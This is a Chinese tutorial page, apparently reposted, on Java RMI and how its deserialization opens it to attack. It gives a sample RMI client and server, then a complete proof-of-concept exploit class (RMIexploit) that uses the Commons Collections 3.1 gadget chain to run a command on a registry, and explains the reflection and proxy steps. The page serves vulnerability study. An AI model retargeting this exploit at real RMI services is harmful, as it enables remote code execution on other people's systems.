微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

java rmi反序列化漏洞 简介

分类:Python作者:whatday原文地址

目录

一、RMI简介

二、RMI示例

三、漏洞复现

四、漏洞分析

1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明?

2、为什么不直接将badAttributeValueExpException对象bind到RMI服务?

 

一、RMI简介

首先看一下RMI在wikipedia上的描述:

Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。
Java RMI极大地依赖于接口。在需要创建一个远程对象的时候,程序员通过传递一个接口来隐藏底层的实现细节。客户端得到的远程对象句柄正好与本地的根代码连接,由后者负责透过网络通信。这样一来,程序员只需关心如何通过自己的接口句柄发送消息。

换句话说,使用RMI是为了不同JVM虚拟机的Java对象能够更好地相互调用,就像调用本地的对象一样。RMI为了隐藏网络通信过程中的细节,使用了代理方法。如下图所示,在客户端和服务器各有一个代理,客户端的代理叫Stub,服务端的代理叫Skeleton。代理都是由服务端产生的,客户端的代理是在服务端产生后动态加载过去的。当客户端通信是只需要调用本地代理传入所调用的远程对象和参数即可,本地代理会对其进行编码,服务端代理会解码数据,在本地运行,然后将结果返回。在RMI协议中,对象是使用序列化机制进行编码的。

调用的方法的描述

  • 编组后的参数

    • 当请求数据到达服务端后会执行如下操作:

    1. 定位要调用的远程对象
    2. 调用所需的方法,并传递客户端提供的参数
    3. 捕获返回值或调用产生的异常。
    4. 将返回值编组,打包送回给客户端存根

    客户端存根对来自服务器端的返回值或异常进行反编组,其结果就成为了调用存根返回值。

    二、RMI示例

    接下来我们编写一个RMI通信的示例,使用IDEA新建一个Java项目,代码结构如下:

    Client.java

    package client;

import service.Hello;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.Scanner;

public class Client {
    public static void main(String[] args) throws Exception{
        // 获取远程主机上的注册表
        Registry registry=LocateRegistry.getRegistry("localhost",1099);
        String name="hello";
        // 获取远程对象
        Hello hello=(Hello)registry.lookup(name);
        while(true){
            Scanner sc = new Scanner( system.in );
            String message = sc.next();
            // 调用远程方法
            hello.echo(message);
            if(message.equals("quit")){
                break;
            }
        }
    }
}

    Server.java

    package server;

import service.Hello;
import service.impl.HelloImpl;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class Server {
    public static void main(String[] args) throws Exception{
        String name="hello";
        Hello hello=new HelloImpl();
        // 生成Stub
        UnicastRemoteObject.exportObject(hello,1099);
        // 创建本机 1099 端口上的RMI registry
        Registry registry=LocateRegistry.createRegistry(1099);
        // 对象绑定到注册表中
        registry.rebind(name,hello);
    }
}

    Hello.java

    package service;

import java.rmi.Remote;
import java.rmi.remoteexception;

public interface Hello extends Remote {

    public String echo(String message) throws remoteexception;
}

    HelloImpl

    package service.impl;

import service.Hello;

import java.rmi.remoteexception;

public class HelloImpl implements Hello {
    @Override
    public String echo(String message) throws remoteexception {
        if("quit".equalsIgnoreCase(message.toString())){
            System.out.println("Server will be shutdown!");
            System.exit(0);
        }
        System.out.println("Message from client: "+message);
        return "Server response:"+message;
    }
}

    先运行Server,然后运行Client,然后即可进行Server与Client的通信

    三、漏洞复现

    RMI反序列化漏洞的存在必须包含两个条件:

    1. 能够进行RMI通信
    2. 目标服务器引用了第三方存在反序列化漏洞的jar包

    注:复现的时候需要JDK8 121以下版本,121及以后加了白名单限制,

    这里我们以Apache Commons Collections反序列化漏洞为例,使用的版本为commons-collections.jar 3.1,这里有对其原理的分析。然后新建一个漏洞利用的类RMIexploit

    package client;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.HashMap;
import java.util.Map;

public class RMIexploit {

    public static void main(String[] args) throws Exception {

        // 远程RMI Server的地址
        String ip = "127.0.0.1";
        int port = 1099;
        // 要执行的命令
        String command = "calc";

        final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
        
        // real chain for after setup
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),new InvokerTransformer("getmethod",new Class[] {String.class,Class[].class },new Object[] {"getRuntime",new Class[0] }),new InvokerTransformer("invoke",new Class[] {Object.class,Object[].class },new Object[] {null,new Object[0] }),new InvokerTransformer("exec",new Class[] { String.class },new Object[] { command }),new ConstantTransformer(1) };

        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap,transformerChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap,"foo");

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field valfield = badAttributeValueExpException.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(badAttributeValueExpException,entry);
        String name = "pwned"+ System.nanoTime();
        Map<String,Object> map = new HashMap<String,Object>();
        map.put(name,badAttributeValueExpException);
        // 获得AnnotationInvocationHandler的构造函数
        Constructor cl = Class.forName(ANN_INV_HANDLER_CLASS).getDeclaredConstructors()[0];
        cl.setAccessible(true);
        // 实例化一个代理
        InvocationHandler hl = (InvocationHandler)cl.newInstance(Override.class,map);
        Object object = Proxy.newProxyInstance(Remote.class.getClassLoader(),new Class[]{Remote.class},hl);
        Remote remote = Remote.class.cast(object);
        Registry registry=LocateRegistry.getRegistry(ip,port);
        registry.bind(name,remote);
    }
}

    后执行RMIexploit

     

    四、漏洞分析

    其实RMI反序列化的POC比Apache Commons Collections反序列化漏洞的POC只是多了RMI的通信步骤,不过这里有几个问题需要专门解释下。

    1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明?

    代码中我们用以下四行反射的方式构造badAttributeValueExpException对象

    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); 
Field valfield = badAttributeValueExpException.getClass().getDeclaredField("val"); 
valfield.setAccessible(true); 
valfield.set(badAttributeValueExpException,tiedMapEntry);

    而不是直接声明的呢

    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);

    要知道BadAttributeValueExpException的构造函数就是给val遍变量赋值

    public BadAttributeValueExpException (Object val) {
    this.val = val == null ? null : val.toString();
}

    但是仔细看这个构造函数,当val不为空的时候,是将val.toString()赋值给this.val,因此这样直接声明的话会直接通过toString()触发命令执行。但是在真正反序列化的时候,由于val变成了String类型,就会造成漏洞无法触发。

    2、为什么不直接将badAttributeValueExpException对象bind到RMI服务?

    执行bind操作需要对象类型为Remote,这里BadAttributeValueExpException无法直接转换为Remote类型,因此需要将其封装在AnnotationInvocationHandler里面。在这个Poc中只要是继承了InvocationHandler的动态代理类都可以,比如我们自定义以下类

    package client;

import javax.management.BadAttributeValueExpException;
import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class PocHandler implements InvocationHandler,Serializable {
    private BadAttributeValueExpException ref;

    protected PocHandler(BadAttributeValueExpException newref) {
        ref = newref;
    }
    //    @Override
    public Object invoke(Object proxy,Method method,Object[] args) throws Throwable {
        return method.invoke(this.ref,args);
    }
}

    Poc代码动态代理声明一行改为

    Object object = Proxy.newProxyInstance(Remote.class.getClassLoader(),new PocHandler(badAttributeValueExpException));

    反序列化过程是递归的,封装在InvocationHandler中badAttributeValueExpException也会执行反序列化操作,因此也能够触发命令执行。但是有些Poc的写法就必须要用sun.reflect.annotation.AnnotationInvocationHandler这个类,因为是利用AnnotationInvocationHandler反序列化过程中readobject函数对map对象的set操作来实现命令执行的,set操作会导致transform操作,使得整个调用链触发。

    private void readobject(java.io.ObjectInputStream s)
        throws java.io.IOException,ClassNotFoundException {
        s.defaultReadobject();

        // Check to make sure that types have not evolved incompatibly

        AnnotationType annotationType = null;
        try {
            annotationType = AnnotationType.getInstance(type);
        } catch(IllegalArgumentException e) {
            // Class is no longer an annotation type; time to punch out
            throw new java.io.InvalidobjectException("Non-annotation type in annotation serial stream");
        }

        Map<String,Class<?>> memberTypes = annotationType.memberTypes();

        // If there are annotation members without values,that
        // situation is handled by the invoke method.
        for (Map.Entry<String,Object> memberValue : memberValues.entrySet()) {
            String name = memberValue.getKey();
            Class<?> memberType = memberTypes.get(name);
            if (memberType != null) {  // i.e. member still exists
                Object value = memberValue.getValue();
                if (!(memberType.isinstance(value) ||
                      value instanceof ExceptionProxy)) {
                    memberValue.setValue(
                        new AnnotationTypeMismatchExceptionProxy(
                            value.getClass() + "[" + value + "]").setMember(
                                annotationType.members().get(name)));
                }
            }
        }
    }

    我本地版本jdk的AnnotationInvocationHandler没有set操作,因此一开始就借助BadAttributeValueExpException进行漏洞触发。

     

     

    版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

    相关推荐

    如何用django开发一个简易个人Blog
    功能概要:(目前已实现功能)公共展示部分:1.网站首页展示已发布的博客记录,包括名称、摘要信息、发布日期、阅读量及评论数。2.首页文章列表可按照分类筛选。3.点击标题或阅读全文链接,进入博客阅读页面,展示文章标题、内容及评论内容。博客后台管理部分:(后台套用了一个叫做ACE的后台模板,改造成了dja
    Python中的几种数据类型
    大体上把Python中的数据类型分为如下几类: Number(数字) 包括int,long,float,complex String(字符串) 例如:hello,&quot;hello&quot;,hello List(列表) 例如:[1,2,3],[1,2,3,[1,2,3],4] Diction
    django开发个人简易Blog——构建项目结构
    开发之前第一步,就是构造整个的项目结构。这就好比作一幅画,第一步就是描绘轮廓,有了轮廓,剩下的就是慢慢的填充细节。项目结构规划如下图:项目结构描述:本项目以fengzhengBlog为根目录。admin、blogapp是两个app目录,用于实现项目主要功能:包括模型定义、视图定义等css、js、im
    Linux下安装Apache并以mod_wsgi方式部署django站点
    源码编译方式安装Apache首先下载Apache源码压缩包,地址为http://mirror.bit.edu.cn/apache/httpd/继续下载apr和apr-util压缩包,地址为http://mirror.bit.edu.cn/apache/apr/下载pcre压缩包,地址为http://
    django开发个人简易Blog—nginx+uwsgin+django1.6+mysql 部署到CentOS6.5
    前面说完了此项目的创建及数据模型设计的过程。如果未看过,可以到这里查看,并且项目源码已经放大到github上,可以去这里下载。代码也已经部署到sina sea上,地址为http://fengzheng.sinaapp.com/先跳过视图展示及表单处理的部分,先介绍一下如何部署。标题中已经把部署环境介
    Scrapy爬取自己的博客内容
    python中常用的写爬虫的库有urllib2、requests,对于大多数比较简单的场景或者以学习为目的,可以用这两个库实现。这里有一篇我之前写过的用urllib2𫯪utifulSoup做的一个抓取百度音乐热门歌曲的例子,有兴趣可以看一下。本文介绍用Scrapy抓取我在博客园的博客列表,只抓
    用python实现的百度音乐下载器-python-pyqt-改进版
    之前写过一个用python实现的百度新歌榜、热歌榜下载器的博文,实现了百度新歌、热门歌曲的爬取与下载。但那个采用的是单线程,网络状况一般的情况下,扫描前100首歌的时间大概得到40来秒。而且用Pyqt做的界面,在下载的过程中进行窗口操作,会出现UI阻塞的现象。 前两天有时间调整了一下,做了几方面的改
    Python:解决中文字符串问题
    本人安装的是Python 2.7版本,由于编写程序的过程中会碰到中文字符串,但由于Python默认采用ASCII编码方式,所以对中文不支持。要解决此问题,必须设置当前编码方式为Unicode方式。默认ASCII编码方式对中文字符产生的异常为:UnicodeDecodeError: &#39;asci
    Django集成百度富文本编辑器uEditor
    UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。首先从ueEditor官网下载最新版本的包,目前官网上提供了ASP、.NET、PHP、JSP版本的,django版本只有一个第三方个人开发的,但看
    django开发个人简易Blog——数据模型
    提到数据模型,一定要说一下MVC,MVC框架是现代web开发中最流行的开发框架,它将数据与业务逻辑分开,减小了应用之间的高度耦合。个人非常喜欢MVC开发框架,除了具有上述特性,它使得web开发变得非常灵活,在ASP.NET上表现的尤为强烈,传统的ASP.NET开发常常用到好多臃肿的服务器端控件,定制
    苹果市值2025年有望达4万亿美元
    pythonJavaScriptjavaHTMLreactjsC#AndroidCSSNode.jssqlrpython-3.xMysqLjQueryc++pandasFlutterangularIOSdjangolinuxswifttypescript路由器JSON路由器设置无线路由器h3c华三华三路由器设置华三路由器电脑软件教程arraysdocker软件图文教程Cvue.jslaravelspring-bootreact-native